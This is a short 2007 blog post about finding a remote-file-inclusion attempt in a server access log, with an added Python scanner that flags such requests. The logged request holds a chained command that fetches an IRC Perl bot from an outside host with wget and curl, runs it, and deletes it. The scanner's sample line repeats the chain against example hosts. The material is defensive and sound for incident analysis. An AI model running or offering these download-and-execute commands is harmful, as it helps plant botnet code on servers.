Wednesday, July 11, 2007

grep cmd access.log
Today I was inspecting the logs:

189.23.39.114 - - [11/Jul/2007:03:20:43 -0400] "GET /fooo.php?fooo=http://www.freewebs.com/cuza0/tool25.dat?&cmd=cd%20/tmp;rm%20-rf%20botnet*;wget%20http://www.freewebs.com/nkparceria/botnet.txt;lwp-download%20http://www.freewebs.com/nkparceria/botnet.txt;fetch%20http://www.freewebs.com/nkparceria/botnet.txt;curl%20-o%20botnet.txt%20http://www.freewebs.com/nkparceria/botnet.txt;GET%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;lynx%20-source%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;perl%20botnet.txt;rm%20-rf%20botnet.txt* HTTP/1.1" 200 4812 "-" "Mozilla/3.0 (compatible; Indy Library)"

You can see the PHP code here:
http://www.freewebs.com/cuza0/tool25.dat
And the IRC Perl bot is here:
http://www.freewebs.com/nkparceria/botnet.txt

Now I am informing Freewebs about the hosting of these evil scripts.
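
The same log hunt with the query string decoded, as an added example (not code from the original post): it flags requests whose parameters carry a remote URL or a chain of download commands like the one in the log line above, and pulls out the URLs so they can be reported or blocked. The sample lines, hosts and parameter names are constructed.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (.+?) HTTP/[\d.]+" (\d{3})')
URL_RE = re.compile(r'(?:https?|ftp)://[^\s;>"\']+', re.I)
# Download helpers seen chained in the request shown in this post
FETCHERS = {"wget", "curl", "fetch", "lwp-download", "lynx", "GET"}

# Constructed sample lines (documentation IPs and example hosts, not real indicators)
SAMPLE = [
    '198.51.100.7 - - [11/Jul/2007:03:20:43 -0400] "GET /page.php?inc=http://files.example.net/tool.dat?&cmd=cd%20/tmp;wget%20http://files.example.net/bot.txt;curl%20-o%20bot.txt%20http://files.example.net/bot.txt;perl%20bot.txt HTTP/1.1" 200 4812 "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '203.0.113.9 - - [11/Jul/2007:03:21:10 -0400] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

def inspect(line):
    """Return a finding for a request with a remote URL or shell commands in its query, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, when, target, status = m.groups()
    query = target.partition("?")[2]
    includes, commands, payloads = {}, [], []
    for pair in query.split("&"):      # split before decoding so ';' inside a value survives
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if URL_RE.match(value):        # the parameter value is itself a remote URL
            includes[name] = value.rstrip("?")
            continue
        steps = [s.strip() for s in value.split(";") if s.strip()]
        if any(s.split()[0] in FETCHERS for s in steps):
            commands.extend(steps)
            for u in URL_RE.findall(value):
                if u not in payloads:
                    payloads.append(u)
    if not includes and not commands:
        return None
    return {"ip": ip, "time": when, "status": int(status),
            "includes": includes, "commands": commands, "payload_urls": payloads}

def scan(lines):
    return [f for f in map(inspect, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 status in a finding only means the server answered the request; whether the include actually ran has to be checked on the host (for example, leftover files in /tmp).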
